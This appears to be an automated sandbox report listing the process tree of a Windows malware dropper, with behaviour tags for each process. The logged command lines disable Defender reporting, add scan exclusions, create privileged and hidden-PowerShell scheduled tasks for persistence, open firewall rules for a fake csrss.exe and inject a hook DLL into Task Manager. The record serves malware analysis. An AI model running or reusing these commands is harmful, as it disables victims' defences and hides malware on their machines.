C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 10006⤵PID:1636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 9086⤵PID:4940
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4604
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3608
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 7526⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 8326⤵PID:2116
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 10126⤵PID:1472
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 6966⤵PID:5104
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:1896
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:972 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:3392
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 11326⤵PID:3552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 11566⤵PID:4780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 10846⤵PID:2040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 11846⤵PID:1260
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 7324⤵
- Program crash
PID:5056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 6924⤵
- Program crash
PID:3064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 3924⤵
- Program crash
PID:60
-
-
-
C:\Users\Admin\Pictures\LhAVHTNnye4bvT2Dg2S6kl8j.exe"C:\Users\Admin\Pictures\LhAVHTNnye4bvT2Dg2S6kl8j.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4480
-
-
C:\Users\Admin\Pictures\iJlEkkLqIhtnHVfNj6uUp1Lx.exe"C:\Users\Admin\Pictures\iJlEkkLqIhtnHVfNj6uUp1Lx.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Users\Admin\Pictures\iJlEkkLqIhtnHVfNj6uUp1Lx.exe"C:\Users\Admin\Pictures\iJlEkkLqIhtnHVfNj6uUp1Lx.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3428 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240204205406" --session-guid=096660af-7524-4cb6-95d5-e8b982c84106 --server-tracking-blob=MjIxODI2MzdlZTEzNGRhOWQ3NjU2ZjU4NGMzY2FkMmI2MWI4MTcxMzcyYWUwZjhmOGZiNDdlM2E0OGM5M2VmMzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNzA4MDAzNy42NzMwIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI3ZmJjZGMxOS0yNWE3LTRlZGQtYjk2MS04NDk2MDg3MjE2NWYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=64050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:332
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\iJlEkkLqIhtnHVfNj6uUp1Lx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\iJlEkkLqIhtnHVfNj6uUp1Lx.exe" --version4⤵PID:4604
-
-
C:\Users\Admin\Pictures\iJlEkkLqIhtnHVfNj6uUp1Lx.exeC:\Users\Admin\Pictures\iJlEkkLqIhtnHVfNj6uUp1Lx.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6ecc9558,0x6ecc9564,0x6ecc95704⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4712
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054061\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054061\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054061\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054061\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1500 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054061\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054061\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x842614,0x842620,0x84262c5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4900
-
-
-
-
C:\Users\Admin\Pictures\7wENfwA4vu2U4MiIr5SlUNvb.exe"C:\Users\Admin\Pictures\7wENfwA4vu2U4MiIr5SlUNvb.exe"3⤵
- Executes dropped EXE
PID:3668 -
C:\Users\Admin\AppData\Local\Temp\7zS9E05.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:4072 -
C:\Users\Admin\AppData\Local\Temp\7zSA0F3.tmp\Install.exe.\Install.exe /JPdidKxawB "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks for any installed AV software in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:2328 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:3284
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:4152
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:4548
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:3412
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:1404
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:3316
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:3692
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:4484
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwksNVKWl"6⤵PID:1384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwksNVKWl" /SC once /ST 12:13:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:2428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvgvHgqNgKCzXIKVFa" /SC once /ST 20:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\wAuDLfm.exe\" Lc /dqsite_idXjO 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwksNVKWl"6⤵PID:468
-
-
-
-
-
C:\Users\Admin\Pictures\uHxENSgCxloCFHT7NHBQrwTP.exe"C:\Users\Admin\Pictures\uHxENSgCxloCFHT7NHBQrwTP.exe"3⤵
- Executes dropped EXE
PID:3948
-
-
C:\Users\Admin\Pictures\jTKkLDWW97ArlwvIoFA1XRD3.exe"C:\Users\Admin\Pictures\jTKkLDWW97ArlwvIoFA1XRD3.exe" /VERYSILENT3⤵
- Executes dropped EXE
PID:1856 -
C:\Users\Admin\AppData\Local\Temp\is-J819H.tmp\jTKkLDWW97ArlwvIoFA1XRD3.tmp"C:\Users\Admin\AppData\Local\Temp\is-J819H.tmp\jTKkLDWW97ArlwvIoFA1XRD3.tmp" /SL5="$11005E,831488,831488,C:\Users\Admin\Pictures\jTKkLDWW97ArlwvIoFA1XRD3.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:2148
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4636 -ip 46361⤵PID:4564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4636 -ip 46361⤵PID:3440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 3721⤵
- Program crash
PID:1348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4636 -ip 46361⤵PID:1264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4480 -ip 44801⤵PID:1596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 3881⤵
- Program crash
PID:4032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4480 -ip 44801⤵PID:568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 3721⤵
- Program crash
PID:556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4480 -ip 44801⤵PID:2064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 6801⤵
- Program crash
PID:2536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4636 -ip 46361⤵PID:2112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4480 -ip 44801⤵PID:2388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7281⤵
- Program crash
PID:3684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4480 -ip 44801⤵PID:2932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4480 -ip 44801⤵PID:4892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4480 -ip 44801⤵PID:2036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7721⤵
- Program crash
PID:1500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4480 -ip 44801⤵PID:1492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4636 -ip 46361⤵PID:896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 8601⤵
- Program crash
PID:4376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7121⤵
- Program crash
PID:5028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4480 -ip 44801⤵PID:1392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4636 -ip 46361⤵PID:3316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7481⤵
- Program crash
PID:3452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7201⤵
- Program crash
PID:2092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7281⤵
- Program crash
PID:1524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4480 -ip 44801⤵PID:4300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 6321⤵
- Program crash
PID:2504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4480 -ip 44801⤵PID:3160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7801⤵
- Program crash
PID:776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 8561⤵
- Program crash
PID:2424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4480 -ip 44801⤵PID:780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 8601⤵
- Program crash
PID:3260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4636 -ip 46361⤵PID:3664
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4636 -ip 46361⤵PID:1420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4636 -ip 46361⤵PID:4900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4480 -ip 44801⤵PID:4924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4636 -ip 46361⤵PID:3992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4636 -ip 46361⤵PID:4420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4480 -ip 44801⤵PID:3720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4636 -ip 46361⤵PID:2332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4480 -ip 44801⤵PID:3948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7881⤵
- Program crash
PID:1164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4480 -ip 44801⤵PID:4740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4636 -ip 46361⤵PID:2456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4480 -ip 44801⤵PID:912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4636 -ip 46361⤵PID:3384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4480 -ip 44801⤵PID:2756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7201⤵
- Program crash
PID:1300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4636 -ip 46361⤵PID:1092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7641⤵
- Program crash
PID:1100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 7481⤵
- Program crash
PID:3688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4636 -ip 46361⤵PID:3548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4636 -ip 46361⤵PID:3216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1172 -ip 11721⤵PID:5028
-
C:\Users\Admin\Pictures\LhAVHTNnye4bvT2Dg2S6kl8j.exe"C:\Users\Admin\Pictures\LhAVHTNnye4bvT2Dg2S6kl8j.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 6522⤵
- Program crash
PID:4792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 7282⤵
- Program crash
PID:856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 7482⤵
- Program crash
PID:1072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 7202⤵
- Program crash
PID:3412 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes3⤵
- Modifies Windows Firewall
PID:2864
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 6962⤵
- Program crash
PID:2684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 6962⤵
- Program crash
PID:1932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 3802⤵
- Program crash
PID:3428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 3642⤵
- Program crash
PID:3008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 3402⤵
- Program crash
PID:3768
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"2⤵PID:5016
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes3⤵
- Modifies Windows Firewall
PID:1992
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵PID:4428
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 8042⤵PID:4816
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 8682⤵PID:4044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1172 -ip 11721⤵PID:3452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1172 -ip 11721⤵PID:3156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2952 -ip 29521⤵PID:2332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1172 -ip 11721⤵PID:4872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2952 -ip 29521⤵PID:4964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2952 -ip 29521⤵PID:1772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2952 -ip 29521⤵PID:4180
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1172 -ip 11721⤵PID:2844
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2952 -ip 29521⤵PID:1256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1172 -ip 11721⤵PID:4124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2952 -ip 29521⤵PID:1420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1172 -ip 11721⤵PID:3836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1172 -ip 11721⤵PID:4936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1172 -ip 11721⤵PID:440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2952 -ip 29521⤵PID:536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2952 -ip 29521⤵PID:3392
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)2⤵
- Launches sc.exe
PID:4852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2952 -ip 29521⤵PID:1392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4636 -ip 46361⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4636 -ip 46361⤵PID:1856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4480 -ip 44801⤵PID:4904
-
